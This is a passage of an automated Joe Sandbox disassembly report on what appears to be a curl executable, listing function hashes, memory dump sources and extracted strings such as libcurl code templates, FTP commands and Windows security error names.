                                      • String ID: Access denied. %c$Authentication cancelled$Authentication failed: %d$PASS %s$STARTTLS denied
                                      • API String ID: 0-2817885744
                                      • Opcode ID: 8aa6ce998cb5a0aba754eae7e0078e27743b6c05c27113e29ff1ea1d4817fa90
                                      • Instruction ID: 1535dbdff42bf4d324f71820f7f8f4e0b758ce469c29a76d023202783f011dbf
                                      • Opcode Fuzzy Hash: 8aa6ce998cb5a0aba754eae7e0078e27743b6c05c27113e29ff1ea1d4817fa90
                                      • Instruction Fuzzy Hash: BA5193A1E0C24346F76CBB29E6043B9E351AF49788F944131D52D46AD5DE6CE44CF3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,00000000,00007FF7F8D01893,?,?,?,00007FF7F8D0172A), ref: 00007FF7F8D025D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: \\?\$|<>"?*
                                      • API String ID: 2803490479-3264285191
                                      • Opcode ID: ab5e173786eb27a97f70c7eb0357122ce0d35f7974788f83e036f76b89f1a07e
                                      • Instruction ID: 93b88d04c5255fbf690302e35b4bf72bdf330bcbd7c0fd4871ce126d4946713b
                                      • Opcode Fuzzy Hash: ab5e173786eb27a97f70c7eb0357122ce0d35f7974788f83e036f76b89f1a07e
                                      • Instruction Fuzzy Hash: A151D411E0E68341FB67AF119944379EE916F1CB94FC84131CEBD062C9DE7CA84DA3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: freemalloc$ErrorLastfreeaddrinfogetaddrinfo
                                      • String ID:
                                      • API String ID: 3538824436-0
                                      • Opcode ID: 97cb612b4ed4e4bdb1a7679e12261598b6d6c75cf2e9ba34a52052d188baaf1a
                                      • Instruction ID: cffa5b5153fb9a496dd0f037249b725e18287a34453cf6c99be897e7ade31987
                                      • Opcode Fuzzy Hash: 97cb612b4ed4e4bdb1a7679e12261598b6d6c75cf2e9ba34a52052d188baaf1a
                                      • Instruction Fuzzy Hash: E6514332A09A4586E724AF11F454739E7A0FF9CB50F894439CE6E07791DF3CE449A398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: fflushfwriteisalpha
                                      • String ID: Content-disposition:$http://$https://
                                      • API String ID: 3958272343-471093890
                                      • Opcode ID: 78faf66d212443e9ef9645a7fd944fb288f17e4c5b2b2dbb37cde66616ce571c
                                      • Instruction ID: f27b4574567029997380dd42dc03cdd8f460e80105a3f46e134d8cefd8a0eaa6
                                      • Opcode Fuzzy Hash: 78faf66d212443e9ef9645a7fd944fb288f17e4c5b2b2dbb37cde66616ce571c
                                      • Instruction Fuzzy Hash: 62418421B0964682EF12AB12D800179E798BF59B84FCC4035DE7C472D9DF3CE889E3A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __acrt_iob_funcfclosefopen
                                      • String ID: %s$%s$Failed to open %s to write libcurl code!
                                      • API String ID: 4110152555-3591596397
                                      • Opcode ID: 0c055616ff5bad057d112f1962a3552dcce06adcdc3fea4f316fba2efeab3a3e
                                      • Instruction ID: 3a7fb7bdaaf416fa7553990fc8fc49d1e5d44dd114729b8a5d4b5d231f47d182
                                      • Opcode Fuzzy Hash: 0c055616ff5bad057d112f1962a3552dcce06adcdc3fea4f316fba2efeab3a3e
                                      • Instruction Fuzzy Hash: 57514020A0EB4280EB16AB069500274EB61AF0DBD0FD85036DA7D577DDDF2CF419A3E8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: fputcfputs
                                      • String ID: $%02x $%04zx: $%s%s, %zd bytes (0x%zx)
                                      • API String ID: 269475090-3384027209
                                      • Opcode ID: 410ad1dfac7e93bc3d0b9de678087d408dd8948ebc9afe258f01ce138cee483f
                                      • Instruction ID: 14306cdd252bbafdaf90df4ebec2e13a18c81a331a805b74fec0493e10998296
                                      • Opcode Fuzzy Hash: 410ad1dfac7e93bc3d0b9de678087d408dd8948ebc9afe258f01ce138cee483f
                                      • Instruction Fuzzy Hash: DB41A422F0C68186EF10EB15D448169F7A5EF48B84FD80535CA7E476D8DE7CE049D7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strtok$_strdupfreeisalnum
                                      • String ID: unrecognized protocol '%s'
                                      • API String ID: 2813575802-1936080967
                                      • Opcode ID: 67d0102a0e3b0f6dbd495e02c5a3694c7223bf18767f8e3fdf05912b1382a1e1
                                      • Instruction ID: b724514ca35ad6a1eac46fb9430698985b2a8c81a237657843b7e95433f1148b
                                      • Opcode Fuzzy Hash: 67d0102a0e3b0f6dbd495e02c5a3694c7223bf18767f8e3fdf05912b1382a1e1
                                      • Instruction Fuzzy Hash: 3041A521A0E74B81FB24BB55945427DE7A0EF0CB90F844435CA7F473D8EE6CE449A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$strchr$malloc
                                      • String ID: ; filename="%s"
                                      • API String ID: 1078366276-4174338374
                                      • Opcode ID: 403233f41d61eaf784b9ff969699071a485a43f1c8a6328fa7737f2f87504350
                                      • Instruction ID: 7baa35e2db00f3b3e84ff1ef5fead5bcf23a96e068407b05fa6b141f610e3d43
                                      • Opcode Fuzzy Hash: 403233f41d61eaf784b9ff969699071a485a43f1c8a6328fa7737f2f87504350
                                      • Instruction Fuzzy Hash: FE31A320A0DA8685FF15AF32B850278E754AF5DFA0F981071CE6E077D1DE3CE4469398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0CF37
                                        • Part of subcall function 00007FF7F8D0C748: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0D189), ref: 00007FF7F8D0C778
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0CF9F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc
                                      • String ID: curl_easy_setopt(hnd, %s, slist%d);$curl_slist_free_all(slist%d);$slist%d = NULL;$slist%d = curl_slist_append(slist%d, "%s");$struct curl_slist *slist%d;
                                      • API String ID: 2190258309-2550099798
                                      • Opcode ID: 67361683f15b096f26ab7b9e974f2b4e8e7efce6597fa53389a5e3baed8a6741
                                      • Instruction ID: 81c827980d8023ac7b27809526645861d59c0b6563d32dfd16af98c7fc831344
                                      • Opcode Fuzzy Hash: 67361683f15b096f26ab7b9e974f2b4e8e7efce6597fa53389a5e3baed8a6741
                                      • Instruction Fuzzy Hash: D6317121A09A4395EB51BB26A840074FB90EF48BD0F840036D93D877D9EF7CE549A7AC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l
                                      • String ID: %*s$%s%luUL);$%s(long)%s%s$curl_easy_setopt(hnd, %s,
                                      • API String ID: 1488884202-843713100
                                      • Opcode ID: 98a00c7f28046c9180e727e7bd7eb3116134e3d245f4b1265851df0539b221b3
                                      • Instruction ID: 0ceac66c82c21c8765e7aea53c06931e05b0468ce7472d4515ac2ffb37f45fc4
                                      • Opcode Fuzzy Hash: 98a00c7f28046c9180e727e7bd7eb3116134e3d245f4b1265851df0539b221b3
                                      • Instruction Fuzzy Hash: E1314F22A08A4695EB60AB15E4407E5F3A0FF88794F840236D97D837D9EF3CD50DA798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF7F8D19168: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FF7F8D19212,?,?,?,?,00000000,?,?,00007FF7F8D19449,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D19185
                                      • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D19357
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D19374
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D19389
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D193CD
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D193DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$_time64calloctolower
                                      • String ID: %s:%d
                                      • API String ID: 3688332945-1029262843
                                      • Opcode ID: 44cbc58830acfad1dd0b70e10c90e09b98beddcef04e1bd801bd1cb696083cd9
                                      • Instruction ID: 0aa58663e3823616c6771df12a631551ae1d9bc41c72e42a6073ab69eec1ab3d
                                      • Opcode Fuzzy Hash: 44cbc58830acfad1dd0b70e10c90e09b98beddcef04e1bd801bd1cb696083cd9
                                      • Instruction Fuzzy Hash: 21315C21A09A4695FB14AB22B81437DE260AF5CFE8FC80130CE2D077D5DE3CE449A398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: Environmentstrchr$ExpandStringsVariable_strdup
                                      • String ID: _curlrc
                                      • API String ID: 69599419-3203016110
                                      • Opcode ID: 608b491f90a0c22c2589febf15ce6a3d171594e44850901141dcb248629e5063
                                      • Instruction ID: 4155fbc82647d1a38797e19efb1126a727bfaf825cde070ab7e90d7d02f011de
                                      • Opcode Fuzzy Hash: 608b491f90a0c22c2589febf15ce6a3d171594e44850901141dcb248629e5063
                                      • Instruction Fuzzy Hash: 2B21A122708A4185EB30AB11E4406EAE3A0FF8CB84FD94131DE9D46799CE3DD54ADB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: CriticalSectionfree$ErrorLastLeavemalloc$Enter__swprintf_lgetaddrinfo
                                      • String ID:
                                      • API String ID: 2209146687-0
                                      • Opcode ID: e804c5892e852256f26f8f7b697d15e91e23ab534e6b64dbb959041b5d2ca9ea
                                      • Instruction ID: 85f52a823f46279f0b513b71f51b72d8c45c55c7c706d0e3cc5267bd89f8579e
                                      • Opcode Fuzzy Hash: e804c5892e852256f26f8f7b697d15e91e23ab534e6b64dbb959041b5d2ca9ea
                                      • Instruction Fuzzy Hash: E321447260CA4682EB40AF65E450269E3A0FF9CF84F980071DA5D477A5CF3CD449DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LIST$NLST$PRET %s$PRET RETR %s$PRET STOR %s
                                      • API String ID: 0-294979158
                                      • Opcode ID: 53b311989eec88c0f9a3a0eac77fb988d3c2a94b4657893af2c266291509e556
                                      • Instruction ID: 96f8cd5dbdb80dd45761904ae503ecb6319a58d720f158d06dff62b23d86688c
                                      • Opcode Fuzzy Hash: 53b311989eec88c0f9a3a0eac77fb988d3c2a94b4657893af2c266291509e556
                                      • Instruction Fuzzy Hash: 90219251D4968B80FB55AB55D8443F5E3A09F49B88FD80036C92C4A2D1DF2CA58DF7B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strchr$strncmp
                                      • String ID: HTTP$The requested URL returned error: %d$The requested URL returned error: %s
                                      • API String ID: 2197385779-4174864708
                                      • Opcode ID: 28be844faac41f93b42d4d9ebf2027b6e2f1c6e48e40b611091809c762441dbc
                                      • Instruction ID: 4edfdeac653a5ea01f37181da8e9e3d18b7363252a44667457b249f529c2bccb
                                      • Opcode Fuzzy Hash: 28be844faac41f93b42d4d9ebf2027b6e2f1c6e48e40b611091809c762441dbc
                                      • Instruction Fuzzy Hash: 4F118725A0D74241FB25AB16B4402B8EB50AF8DBC0FDC4570DB5D0B7C5DE2CE4499BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_WRONG_CREDENTIAL_HANDLE
                                      • API String ID: 2544740495-3592922199
                                      • Opcode ID: 5e82f5a7df321d80000e6c514240b7b0788326fdaf1570e469f5a550412ce8d8
                                      • Instruction ID: bd7bb307fd1608a54eb5388468a9c2999c73ade4aaf74f135b14ad06748fd14b
                                      • Opcode Fuzzy Hash: 5e82f5a7df321d80000e6c514240b7b0788326fdaf1570e469f5a550412ce8d8
                                      • Instruction Fuzzy Hash: 9501FF2560D94696F755BF61A0142BCE311AF5CBA5FC50075CE2E077D1CF3C9449A3B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_WRONG_PRINCIPAL
                                      • API String ID: 2544740495-1567375120
                                      • Opcode ID: 71b5bd0bd2c4ab393c8ec79bf7120c6e552326132cc97a442f3191a6bacb258b
                                      • Instruction ID: 25a3b4ff6ec97f3ebbbee5cab11ff5d28cf8b9df003f4196d4bbe9698c5f8086
                                      • Opcode Fuzzy Hash: 71b5bd0bd2c4ab393c8ec79bf7120c6e552326132cc97a442f3191a6bacb258b
                                      • Instruction Fuzzy Hash: 57014F2560D94296F755BF61A0142BCE311AF4CBA1FC50075CE2E077D1CF3C9449A3B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_UNSUPPORTED_FUNCTION
                                      • API String ID: 2544740495-3154753693
                                      • Opcode ID: f695e7b5798694bafefd2624ce01e6bfa24dc276d829e8f6caec7b07cd320753
                                      • Instruction ID: e4af88f6b82697010f6321423e8281280dec2ebceb24c6cbc9906e657dce0c54
                                      • Opcode Fuzzy Hash: f695e7b5798694bafefd2624ce01e6bfa24dc276d829e8f6caec7b07cd320753
                                      • Instruction Fuzzy Hash: 59012C25A0D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3C9449A6A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_UNSUPPORTED_PREAUTH
                                      • API String ID: 2544740495-3293119623
                                      • Opcode ID: 07bbe96144a09a96b1eb56c05cf1bed29e3bbd84e64be6ab265ccf252e0b96ff
                                      • Instruction ID: 9082a13789ca6b7278e624ff0763ce119d789366688556ef905a49e12d683293
                                      • Opcode Fuzzy Hash: 07bbe96144a09a96b1eb56c05cf1bed29e3bbd84e64be6ab265ccf252e0b96ff
                                      • Instruction Fuzzy Hash: BC012C2560D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_UNTRUSTED_ROOT
                                      • API String ID: 2544740495-1393992520
                                      • Opcode ID: 973212ccd0867228b92a0ba13a3e1da5f0c8bf4ecced34b26a802e2d60853c05
